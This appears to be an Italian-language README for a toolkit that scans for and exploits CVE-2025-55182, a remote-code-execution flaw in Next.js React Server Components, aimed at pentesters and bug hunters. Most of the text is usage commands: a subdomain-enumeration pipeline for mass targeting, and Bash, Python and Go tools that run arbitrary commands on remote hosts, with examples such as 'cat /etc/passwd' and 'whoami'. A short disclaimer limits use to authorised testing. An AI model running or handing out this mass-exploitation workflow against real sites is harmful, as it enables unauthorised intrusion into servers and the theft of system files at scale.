
Scanner RCE ad alta fedeltà per CVE-2025-55182 che colpisce Next.js RSC. Supporta scansione di massa, esecuzione di comandi e pipeline di ricognizione automatizzate. Progettato per pentesters, ricercatori e cacciatori di bug.
Un toolkit completo per rilevare e sfruttare CVE-2025-55182, una vulnerabilità critica di Remote Code Execution nelle applicazioni Next.js che utilizzano React Server Components.
Questo repository include uno scanner Bash unificato (modalità Singola e Massiva), implementazioni Python/Go e un flusso di lavoro per ricognizione bug bounty.

Per la caccia massiva su domini wildcard, usa questa pipeline per filtrare i target prima della scansione:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
Lo script scanner.sh supporta scansioni su singolo target e scansioni massive da un elenco di file.
chmod +x scanner.sh
Ideale per verificare un target specifico con output dettagliato.
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Scansiona efficientemente un elenco di URL e salva gli host vulnerabili in un file.
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
Usa questa se incontri problemi con l'escape di caratteri speciali in Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Alte prestazioni, dipendenze minime.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Questo strumento è solo per scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato è strettamente illegale. Lo sviluppatore non si assume alcuna responsabilità per uso improprio o danni causati da questo programma.
Dettaglio CVE NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Avviso di sicurezza React (vulnerabilità React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Template Nuclei di ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Descrizione |
|---|
-d, --domain | URL del singolo target |
-l, --list | File contenente un elenco di URL |
-c, --command | Comando da eseguire (default: id) |
-o, --output | File di output per host vulnerabili (default: vulnerable_hosts.txt) |